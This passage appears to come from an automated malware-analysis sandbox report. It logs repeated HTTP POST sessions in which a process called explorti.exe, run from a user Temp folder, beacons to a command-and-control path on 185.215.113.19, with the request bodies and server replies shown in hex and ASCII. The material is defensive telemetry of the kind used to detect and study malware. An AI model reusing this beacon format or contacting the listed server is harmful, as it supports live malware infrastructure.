                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:27.132786989 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  19192.168.2.449756185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:27.253922939 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:28.021810055 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:27 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:28.022893906 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:28.272988081 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:28 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  20192.168.2.449757185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:28.394347906 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:29.142203093 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:29.144819021 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:29.408874035 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:29 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  21192.168.2.449758185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:29.518965006 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:30.265858889 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:30.266663074 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:30.515628099 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:30 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  22192.168.2.449759185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:30.632292986 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:31.403126001 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:31.405514002 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:31.655787945 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:31 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  23192.168.2.449760185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:31.769231081 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:32.518279076 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:32.519779921 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:32.767766953 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  24192.168.2.449761185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:32.879812956 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:33.645919085 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:33.647157907 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:33.933999062 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  25192.168.2.449762185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:34.050268888 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:34.818154097 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:34.819289923 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:35.066618919 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  26192.168.2.449763185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:35.175261974 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:35.934223890 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:35.935643911 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:36.182477951 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  27192.168.2.449764185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:36.300513983 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:37.067852974 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:37.068547964 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:37.319664955 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  28192.168.2.449765185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:37.441212893 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:38.191942930 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:38.192975998 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:38.438477039 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  29192.168.2.449766185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:38.550211906 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:39.332725048 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:39.335530043 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
                  Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 33 32 43 37 33 42 38 35 46 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                  Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB32C73B85F82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                  Jul 27, 2024 04:50:39.588191032 CEST196INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 7 <c><d>0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  30192.168.2.449767185.215.113.19807756C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                  TimestampBytes transferredDirectionData
                  Jul 27, 2024 04:50:39.706079960 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 4
                  Cache-Control: no-cache
                  Data Raw: 73 74 3d 73
                  Data Ascii: st=s
                  Jul 27, 2024 04:50:40.506158113 CEST219INHTTP/1.1 200 OK
                  Server: nginx/1.18.0 (Ubuntu)
                  Date: Sat, 27 Jul 2024 02:50:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Refresh: 0; url = Login.php
                  Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 1 0
                  Jul 27, 2024 04:50:40.507093906 CEST306OUTPOST /Vi9leo/index.php HTTP/1.1
                  Content-Type: application/x-www-form-urlencoded
                  Host: 185.215.113.19
                  Content-Length: 154
                  Cache-Control: no-cache
